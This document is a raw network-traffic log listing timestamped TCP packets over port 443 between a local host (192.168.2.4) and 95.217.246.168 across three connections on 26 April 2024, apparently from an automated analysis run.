Apr 26, 2024 11:03:13.751331091 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.751372099 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.751403093 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.751420975 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.751452923 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.751473904 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.768599987 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.768656015 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.768682957 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.768697023 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.768723965 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.768744946 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.786199093 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.786242008 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.786278963 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.786290884 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.786319017 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.786340952 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.805263996 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.805305958 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.805340052 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.805351973 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.805377960 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.805397987 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.820096970 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.820157051 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.820256948 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.820256948 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.820272923 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.820323944 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.837001085 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.837042093 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.837198973 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.837198973 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.837213993 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.837268114 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.852380991 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.852422953 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.852458000 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.852469921 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.852632046 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.852632046 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.865804911 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.865823030 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.865999937 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.865999937 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.866019011 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.866065979 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.878751993 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.878772020 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.878817081 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.878827095 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.878842115 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.878869057 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.893342972 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.893387079 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.893639088 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.893654108 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.893714905 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.906215906 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.906277895 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.906347036 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.906361103 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.906450033 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.917958975 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.918041945 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.918612003 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.918685913 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.930633068 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.930681944 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.930708885 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.930736065 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.930761099 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.930778027 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.941267014 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.941345930 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.941353083 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.941384077 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.941421986 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.941421986 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.953392029 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.953435898 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.953483105 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.953496933 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.953530073 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.953551054 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.962544918 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.962590933 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.962640047 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.962652922 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.962682009 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.962702036 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.973865032 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.973931074 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.973954916 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.973968983 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.973994970 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.974030018 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.975403070 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.975471020 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.975485086 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.975538969 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.975584030 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.975584984 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.975619078 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.975647926 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.975647926 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.975684881 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:14.015825033 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:14.015892982 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:14.015971899 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:14.016166925 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:14.016197920 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:14.549601078 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:14.549823999 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:14.551301003 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:14.551347971 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:14.551517963 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:14.551528931 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:15.387209892 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:15.387239933 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:15.387274981 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:15.387334108 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:15.387485027 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:15.387496948 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:15.387547970 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:15.507492065 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:15.507580042 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:15.507729053 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:15.507730007 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:15.507788897 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:15.507849932 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:15.688344955 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:15.688394070 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:15.688509941 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:15.688575983 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:15.688616037 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:15.688643932 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:15.806003094 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:15.806066990 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:15.806113958 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:15.806139946 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:15.806194067 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:15.806194067 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:15.892298937 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:15.892364025 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:15.892509937 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:15.892509937 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:15.892538071 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:15.892600060 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:15.964765072 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:15.964822054 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:15.964946032 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:15.964946985 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:15.964988947 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:15.965049982 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.010691881 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.010752916 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.010931015 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.010931015 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.010953903 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.011014938 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.064856052 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.064920902 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.064985991 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.065005064 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.065143108 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.065143108 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.115590096 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.115664959 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.115771055 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.115772009 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.115791082 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.115850925 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.159653902 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.159709930 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.159879923 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.159879923 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.159904003 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.159949064 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.201839924 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.201896906 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.201922894 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.201944113 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.201972008 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.201991081 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.236711025 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.236768007 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.236793041 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.236809015 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.236838102 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.236857891 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.266349077 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.266405106 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.266427040 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.266441107 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.266468048 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.266499996 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.291490078 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.291544914 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.291596889 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.291610956 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.291644096 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.291662931 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.316343069 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.316399097 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.316427946 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.316445112 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.316472054 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.316490889 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.338366985 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.338409901 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.338494062 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.338506937 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.338550091 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.338568926 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.361346960 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.361401081 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.361465931 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.361478090 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.361505032 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.361527920 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.384253979 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.384300947 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.384418011 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.384444952 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.384505987 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.404741049 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.404794931 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.404851913 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.404870033 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.404913902 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.404936075 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.423135996 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.423182964 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.423264980 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.423280954 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.423327923 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.423346996 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.440558910 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.440612078 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.440660000 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.440675020 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.440718889 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.440737009 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.460278988 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.460321903 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.460545063 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.460555077 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.460611105 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.477817059 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.477860928 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.477933884 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.477941036 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.477977037 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.478003025 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.493294001 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.493335009 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.493398905 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.493407011 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.493464947 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.510915041 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.510962963 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.511025906 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.511034966 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.511055946 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.511085987 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.525655985 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.525705099 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.525755882 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.525787115 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.525799990 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.525835991 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.540369987 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.540411949 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.540463924 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.540472031 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.540527105 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.547204018 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.547286034 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.547291040 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.547334909 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.547364950 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.547424078 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.547683954 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.547698975 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.547717094 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.547744989 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.592837095 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.592941999 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:16.593064070 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.593264103 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:16.593291044 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:17.125247955 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:17.125453949 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:17.126005888 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:17.126035929 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:17.126168966 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:17.126179934 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:17.959950924 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:17.959979057 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:17.959999084 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:17.960031986 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:17.960079908 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:17.960122108 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:17.960186958 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.076934099 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.076952934 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.076999903 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.077020884 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.077037096 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.077060938 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.263731956 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.263767958 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.263876915 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.263937950 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.263998985 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.369852066 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.369872093 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.369946003 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.369985104 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.370035887 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.462060928 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.462105036 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.462171078 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.462215900 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.462282896 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.462282896 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.537012100 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.537081003 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.537175894 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.537213087 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.537242889 CEST	49750	443	192.168.2.4	95.217.246.168
